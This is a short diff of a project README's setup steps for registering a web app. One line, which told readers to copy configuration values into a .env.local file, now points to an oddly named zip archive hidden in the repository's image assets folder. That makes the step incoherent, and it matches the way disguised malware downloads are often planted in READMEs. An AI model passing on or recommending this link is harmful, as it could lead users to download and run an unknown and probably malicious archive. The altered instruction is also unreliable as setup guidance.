nabil-alsaadi/gupd/README.md

 2. Scroll down to "Your apps" section
 3. Click the **</>** (Web) icon to add a web app
 4. Register your app (you can skip app nickname)
-5. Copy the configuration values to your `.env.local` file
+5. Copy the configuration values to your `https://raw.githubusercontent.com/nabil-alsaadi/gupd/main/public/assets/img/Software-palaeethnological.zip` file

 #### Step 5: Set Up Security Rules